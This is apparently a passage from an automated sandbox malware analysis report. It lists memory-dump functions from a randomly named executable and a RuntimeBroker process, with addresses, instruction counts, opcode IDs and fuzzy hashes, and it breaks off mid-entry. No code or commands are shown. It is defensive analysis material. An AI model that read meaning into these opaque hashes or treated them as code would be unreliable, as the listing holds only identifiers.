                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8376cbb7b3933dfa230c10f18b49edecd579481b3855a6a76dd0945f40bde7a1
                                                                                      • Instruction ID: 4541fce71d7268346ab946a5ca2a4d2f1040646d4da02423522929b8f9abee86
                                                                                      • Opcode Fuzzy Hash: 8376cbb7b3933dfa230c10f18b49edecd579481b3855a6a76dd0945f40bde7a1
                                                                                      • Instruction Fuzzy Hash: 7FE01224F1E11E4BFFB4F794C4657BC66519F98300F124074D40EE32E1DE286E418744
                                                                                      Function 00007FFD9BC899E8 Relevance: .0, Instructions: 14COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2733064776.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9bc80000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a9fba13757a84dc399704c631768f83c74f782b10b547eccc999cc3699ae83b4
                                                                                      • Instruction ID: c6a4d57548ce41f8feb589004f946eeda496d3e1a609e8e5df6f6b6727566680
                                                                                      • Opcode Fuzzy Hash: a9fba13757a84dc399704c631768f83c74f782b10b547eccc999cc3699ae83b4
                                                                                      • Instruction Fuzzy Hash: B4C08030511C0C4FC70CE734C458C6473D0FB192017C10094D00EC7170D959DD94C741
                                                                                      Function 00007FFD9B890705 Relevance: .0, Instructions: 13COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2542470106.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b890000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1b964bff2f6a6961ad1cf75d421020a0df73bbfdbbcb758d8d1abc78bf5b962b
                                                                                      • Instruction ID: dd528de23fe39d29e397bb87cc43918efda9675f8775ee5b947c3cdbab3474a6
                                                                                      • Opcode Fuzzy Hash: 1b964bff2f6a6961ad1cf75d421020a0df73bbfdbbcb758d8d1abc78bf5b962b
                                                                                      • Instruction Fuzzy Hash: 45C08C01F6F40F90ED3033ED14660BCB9409FCCA20FD30032C00CC00E4AC0E23850582
                                                                                      Function 00007FFD9B891BC8 Relevance: .0, Instructions: 12COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2542470106.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b890000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6a5162551570903f5fde7fa87322f93947087cdf53ab7cc84a8b4d8a915173be
                                                                                      • Instruction ID: e26fc5b4efa652df2bbfa4f0433417b3accce0671069ce48a98bf16b584644a1
                                                                                      • Opcode Fuzzy Hash: 6a5162551570903f5fde7fa87322f93947087cdf53ab7cc84a8b4d8a915173be
                                                                                      • Instruction Fuzzy Hash: 34C08C3051180C8FC908EB2AC88480437A0FB0D204BC20090E009C7270D219DCC1C740
                                                                                      Function 00007FFD9BC82D2B Relevance: .0, Instructions: 11COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2733064776.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9bc80000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8178988d89ec8674ba43568580c5592b5c80e2f8b7cee0afb0af2fea3e1606b6
                                                                                      • Instruction ID: ef8d013f8dd1ab693ec9f08633e0e8f0dafe3aae9fc743e6a62af07ec0ef43ce
                                                                                      • Opcode Fuzzy Hash: 8178988d89ec8674ba43568580c5592b5c80e2f8b7cee0afb0af2fea3e1606b6
                                                                                      • Instruction Fuzzy Hash: ECD09260B1ED1B85F23847E5813823E59929F04300FA2847ED05F898F5C9387B46E601
                                                                                      Function 00007FFD9B89495F Relevance: .0, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2542470106.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b890000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3e9c13c8da01c61ae524ad78fd6388e08fd6384994589c5503da6e87394e6a9d
                                                                                      • Instruction ID: 5db00b8b68f3ed98146b0da3957a3cc38e73788dde41762f27e75208c3694f60
                                                                                      • Opcode Fuzzy Hash: 3e9c13c8da01c61ae524ad78fd6388e08fd6384994589c5503da6e87394e6a9d
                                                                                      • Instruction Fuzzy Hash: 6FC00285F0E25B15FEB167D556652B80A444F29365F0A4179D58D865E2DD0C6A010229
                                                                                      Function 00007FFD9B890728 Relevance: .0, Instructions: 8COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2542470106.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b890000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5291abeda7496d3368404e744cf063c162d98c6f93be64673f1fd6acfcbac899
                                                                                      • Instruction ID: 847c847f9cace75ae8bcb2df13b6db3745f01fec73c6f3779f37ff5bca68f02d
                                                                                      • Opcode Fuzzy Hash: 5291abeda7496d3368404e744cf063c162d98c6f93be64673f1fd6acfcbac899
                                                                                      • Instruction Fuzzy Hash: 5AB01200D9B40F00DD3433F508560A478005B8C100FC20170D409800E5DC4D12940242
                                                                                      Function 00007FFD9B8965CA Relevance: .0, Instructions: 5COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2542470106.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b890000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8195716ec12102436166c874ff99a9ac0157c14793f7303e5de14f1f667a76d7
                                                                                      • Instruction ID: 64e3faedded6b615ff164ab5c0658fd90eb22728fbde89f2975bbfb500c23bf8
                                                                                      • Opcode Fuzzy Hash: 8195716ec12102436166c874ff99a9ac0157c14793f7303e5de14f1f667a76d7
                                                                                      • Instruction Fuzzy Hash: 8BB01210E0C01D5DE7609B54881037C94A0EF2C300F1100F2C02DE31C3EB281D004600
                                                                                      Function 00007FFD9B8930A0 Relevance: .0, Instructions: 2COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000035.00000002.2542470106.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b890000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 49a013b6b0d9c2700980600510b396546e3a2fc01e3d891a89915a86f1a37ee5
                                                                                      • Instruction ID: 993146e6ab8ea8262cdffa6db9040e4c2607ca78daf5a237243687c05f46532b
                                                                                      • Opcode Fuzzy Hash: 49a013b6b0d9c2700980600510b396546e3a2fc01e3d891a89915a86f1a37ee5
                                                                                      • Instruction Fuzzy Hash:

                                                                                      Executed Functions

                                                                                      Function 00007FFD9B861698 Relevance: .3, Instructions: 261COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2046a70e38853a20d77f36698816b00ea51871248067eeb6913b6728851fbb00
                                                                                      • Instruction ID: 450be33e82dbb7d9f72379e52ef755735a7fc0dcd1b1e2b47cf66c5efe92f631
                                                                                      • Opcode Fuzzy Hash: 2046a70e38853a20d77f36698816b00ea51871248067eeb6913b6728851fbb00
                                                                                      • Instruction Fuzzy Hash: B891D271A19A8D8FE788EB68C8697E87BE1FF55301F4401BAD049C76E6DBBC64058740
                                                                                      Function 00007FFD9B860A19 Relevance: .3, Instructions: 283COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 564f4423bb34da6f2c71a19c4cc0d95b9fd2b8f55da1d00d2e7409bac4534587
                                                                                      • Instruction ID: 6aa88c535c39f9f393c4a70182a70fe5711e36f0a3d54dfeae81c347cd0240d2
                                                                                      • Opcode Fuzzy Hash: 564f4423bb34da6f2c71a19c4cc0d95b9fd2b8f55da1d00d2e7409bac4534587
                                                                                      • Instruction Fuzzy Hash: F4712511B2EA4E4EE768667808A52B976C2DF89B55F66023DD0CFC32E7ED1C69034245
                                                                                      Function 00007FFD9B860850 Relevance: .2, Instructions: 180COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c462211b8e8d387a38b44ec7089fe62f0920bf091a86f7dbb092cd6bcbb9abda
                                                                                      • Instruction ID: e7b964c0e5ba19d650b928df5c568c3308f501bd4a0f3cfffcb13dce890eee8d
                                                                                      • Opcode Fuzzy Hash: c462211b8e8d387a38b44ec7089fe62f0920bf091a86f7dbb092cd6bcbb9abda
                                                                                      • Instruction Fuzzy Hash: D3514B32F1DA5C8FD764EB7C88A46AA77E1FF4D311B05017AE09AC72A7DE2498018741
                                                                                      Function 00007FFD9B8607D3 Relevance: .1, Instructions: 128COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c1dbffcbb5ef153721b08439b3af4a5fd0362fdce0eac83922e54c15f73a55f3
                                                                                      • Instruction ID: c1b9ee478b7a1f8619bd1fbb7fc8e07f8b20bdad4e71612f85445b4b03c2e1ec
                                                                                      • Opcode Fuzzy Hash: c1dbffcbb5ef153721b08439b3af4a5fd0362fdce0eac83922e54c15f73a55f3
                                                                                      • Instruction Fuzzy Hash: D0319C37B1D6994FD721B77CA8A50EA3FE0EF89239B04017BD1C9CA093DD2494478695
                                                                                      Function 00007FFD9B86080D Relevance: .1, Instructions: 116COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fb0d9fec88df3fb5f1f94967296982c73d501746ad457dae859856b2f5cf8090
                                                                                      • Instruction ID: ffa0d82a3cdca0da0f1b5cb141b98c30c3153ab37ed52f0dd6b78150b7b93b16
                                                                                      • Opcode Fuzzy Hash: fb0d9fec88df3fb5f1f94967296982c73d501746ad457dae859856b2f5cf8090
                                                                                      • Instruction Fuzzy Hash: 9E317C32B5E7984FD721B77C58A90FA3FE0EF89239B05017BE0C9CA193ED2490468795
                                                                                      Function 00007FFD9B8612B0 Relevance: .1, Instructions: 116COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 891621908b84e31796a686e1f006ca5838beed2ff7a8dbe50125984065d31de5
                                                                                      • Instruction ID: e655901ad161095aad127547c9c6a708b4ed84ae77df893718cd64af545ef117
                                                                                      • Opcode Fuzzy Hash: 891621908b84e31796a686e1f006ca5838beed2ff7a8dbe50125984065d31de5
                                                                                      • Instruction Fuzzy Hash: 87314C21F5CA1D4FE758B77C686AAF973C2DF89365B4440BAE40EC32E7DC58AC414285
                                                                                      Function 00007FFD9B860820 Relevance: .1, Instructions: 106COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3f496a09f6fe4225c1a191d4a54ece360f3c48032e2fa0a7f9ac7e9c85a1a647
                                                                                      • Instruction ID: 8eec9622caad60d1919ea7d2716cac8079cc33d0248defca5919db4bbb9aa285
                                                                                      • Opcode Fuzzy Hash: 3f496a09f6fe4225c1a191d4a54ece360f3c48032e2fa0a7f9ac7e9c85a1a647
                                                                                      • Instruction Fuzzy Hash: F1218C32A5D7984FE721B77C58A50FA3FE0EF49239F04017BE0DACA193ED2490468795
                                                                                      Function 00007FFD9B8612E8 Relevance: .1, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7c295e915c50a883a42be59db7c6093a3c7cbfc5eded2c6874d2871c3ea9bb1f
                                                                                      • Instruction ID: 8cdb118e2832de922f5c00c1eb1df737bf3c87fbd285668d1b2532cc654dae7a
                                                                                      • Opcode Fuzzy Hash: 7c295e915c50a883a42be59db7c6093a3c7cbfc5eded2c6874d2871c3ea9bb1f
                                                                                      • Instruction Fuzzy Hash: C2213A20B18E5D4FE788FB6C586EA7972C2DB9D315F4400B9E40EC32E7DD189C418281
                                                                                      Function 00007FFD9B861575 Relevance: .1, Instructions: 80COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ab3f5658f336cf2876d0484d31e302a203a4619631e04c5d9d580799b4be4d9e
                                                                                      • Instruction ID: 710f879cf470863e2fe3373d3c648274f5c5bfe1f5f982dca46931edff01f151
                                                                                      • Opcode Fuzzy Hash: ab3f5658f336cf2876d0484d31e302a203a4619631e04c5d9d580799b4be4d9e
                                                                                      • Instruction Fuzzy Hash: 67210335B0964ECFE710FBA8C8696ECBBB0EF94311F5541B6C154C7193EA34A689CB40
                                                                                      Function 00007FFD9B861588 Relevance: .1, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 670109c2ed75a270fa84168a99d12e64013a92adf950f11aa8a82e606cf027bc
                                                                                      • Instruction ID: 013515f410faf167bed28fd54e10c83c6a48c526ddee5f9a5c308b2eeef2b676
                                                                                      • Opcode Fuzzy Hash: 670109c2ed75a270fa84168a99d12e64013a92adf950f11aa8a82e606cf027bc
                                                                                      • Instruction Fuzzy Hash: E301C435B0964D8FDB01FBB8C4545DCBBB0EF85315F1546B6C094C7292E63497598780
                                                                                      Function 00007FFD9B862C94 Relevance: .1, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0bc184d7401e7241976788b71161a689f2e20b6a369857e7caa72c5ca68f6dee
                                                                                      • Instruction ID: 4372fbf44cec6690e59da48e878581c548c101766828a009ae6df3bfefe0729b
                                                                                      • Opcode Fuzzy Hash: 0bc184d7401e7241976788b71161a689f2e20b6a369857e7caa72c5ca68f6dee
                                                                                      • Instruction Fuzzy Hash: A011E230A0891C8FDB98DF08C855BD973E2FB58305F1541ADD10ED76A1DB359A85CF45
                                                                                      Function 00007FFD9B861590 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3e28db8a1fabba3cf7e10a160f82d37380007dcc35aef180307726fc3dfa470d
                                                                                      • Instruction ID: 1e250afb4eab1c105841deed50e901737ff9664ba347b6b7ce40993ca5c61d73
                                                                                      • Opcode Fuzzy Hash: 3e28db8a1fabba3cf7e10a160f82d37380007dcc35aef180307726fc3dfa470d
                                                                                      • Instruction Fuzzy Hash: 2A01B135B0964D8FEB11FBA8C4545DDBBB0EF45315F1546B6C094CB292EA34A7898780
                                                                                      Function 00007FFD9B861598 Relevance: .0, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 32c83054273fd199ff01052b192e5de36f1abed5e17595054cd0c24b2e35722a
                                                                                      • Instruction ID: c6de60a4e95c125b0e183863d231682cf2dd9b1df6ddbad731bf655da774b381
                                                                                      • Opcode Fuzzy Hash: 32c83054273fd199ff01052b192e5de36f1abed5e17595054cd0c24b2e35722a
                                                                                      • Instruction Fuzzy Hash: 6F01FD34B0A28DCFDB11EBA8C8545ECBBB0EF45314F1442B6C084CB292EA34A7898780
                                                                                      Function 00007FFD9B8615A0 Relevance: .0, Instructions: 37COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e7e314e10f930c3b5dc0fb2e018ba5586fe63dc0086372106d058a67ceaf7fb3
                                                                                      • Instruction ID: be1ea1d1036997202cac62bff5981f53b852319f046db152caf4e4a5b01da16e
                                                                                      • Opcode Fuzzy Hash: e7e314e10f930c3b5dc0fb2e018ba5586fe63dc0086372106d058a67ceaf7fb3
                                                                                      • Instruction Fuzzy Hash: 7EF08C34E0A28DDEEB11EBA4C5545EDBBB1EF05314F5452A6D045C7292EA74A7848780
                                                                                      Function 00007FFD9B86326E Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d6de258a3e3bd4d6eb3c18cc8f61e800c9c0fd198b3bbba04686d85d6de6e8a2
                                                                                      • Instruction ID: 49cdcbda651ef79b7c6cf8876bf8a5bb46665751b86deaa9a202af0ec74d1c45
                                                                                      • Opcode Fuzzy Hash: d6de258a3e3bd4d6eb3c18cc8f61e800c9c0fd198b3bbba04686d85d6de6e8a2
                                                                                      • Instruction Fuzzy Hash: 1AE02020B1CA594FD715A65C88B55B87391DF2C700F1000F2D41DE31D7DD647E4147C1
                                                                                      Function 00007FFD9B864912 Relevance: .0, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8376cbb7b3933dfa230c10f18b49edecd579481b3855a6a76dd0945f40bde7a1
                                                                                      • Instruction ID: a7111a5cf8304330d4f1f898cfd59eab36aa374f85973b720c19934f6be825ba
                                                                                      • Opcode Fuzzy Hash: 8376cbb7b3933dfa230c10f18b49edecd579481b3855a6a76dd0945f40bde7a1
                                                                                      • Instruction Fuzzy Hash: 33E01220F1A11E8FFBB4F794C4657BC62519F98300F9250B4D40EE32E6DD286E419744
                                                                                      Function 00007FFD9B860705 Relevance: .0, Instructions: 13COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1b964bff2f6a6961ad1cf75d421020a0df73bbfdbbcb758d8d1abc78bf5b962b
                                                                                      • Instruction ID: e2efb28efd2030582f2b94126146dd60df4dd52828dd202dd99ac55589ebcb75
                                                                                      • Opcode Fuzzy Hash: 1b964bff2f6a6961ad1cf75d421020a0df73bbfdbbcb758d8d1abc78bf5b962b
                                                                                      • Instruction Fuzzy Hash: ACC08C00F6B80FC8E53833E914A70ACA2409BCCA10FD31032C00C800B9AC4E23851686
                                                                                      Function 00007FFD9B861BC8 Relevance: .0, Instructions: 12COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6a5162551570903f5fde7fa87322f93947087cdf53ab7cc84a8b4d8a915173be
                                                                                      • Instruction ID: 731851d84390f0c41736b8267269be39596ad08ca66d1d30114b9de1a637f4cc
                                                                                      • Opcode Fuzzy Hash: 6a5162551570903f5fde7fa87322f93947087cdf53ab7cc84a8b4d8a915173be
                                                                                      • Instruction Fuzzy Hash: 15C08C30511C0C8FC908EB2AC88580433A0FB4D208BC20090E009C7270D219DCC1C740
                                                                                      Function 00007FFD9B86495F Relevance: .0, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3e9c13c8da01c61ae524ad78fd6388e08fd6384994589c5503da6e87394e6a9d
                                                                                      • Instruction ID: 7c33ec76a012ae929e59e9da952bb4dd4332c5a9e21af060aeebf87ee10d9bec
                                                                                      • Opcode Fuzzy Hash: 3e9c13c8da01c61ae524ad78fd6388e08fd6384994589c5503da6e87394e6a9d
                                                                                      • Instruction Fuzzy Hash: 63C01280F0E10B8DFBA0239112293BC02404F29361F8A10B9D58D821E39C0C6A011229
                                                                                      Function 00007FFD9B860728 Relevance: .0, Instructions: 8COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5291abeda7496d3368404e744cf063c162d98c6f93be64673f1fd6acfcbac899
                                                                                      • Instruction ID: 7a3ff972c701c47c8497d99d16899b0d405b34eb97d54320f3cf6b1cc0e5afa7
                                                                                      • Opcode Fuzzy Hash: 5291abeda7496d3368404e744cf063c162d98c6f93be64673f1fd6acfcbac899
                                                                                      • Instruction Fuzzy Hash: B7B01200D9780F44D53433F508670A870005B8C104FC21170D408801B6DC8D12941342
                                                                                      Function 00007FFD9B8665CA Relevance: .0, Instructions: 5COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4baf4b1be4bdb692a7f7a5e968b7d18b4c5d88363c5ecac3d8b24ecffa76977d
                                                                                      • Instruction ID: 39c2542c3cabd34fea6eb3bb0939dcf3f0112d02eee39c16ed8365a89e652324
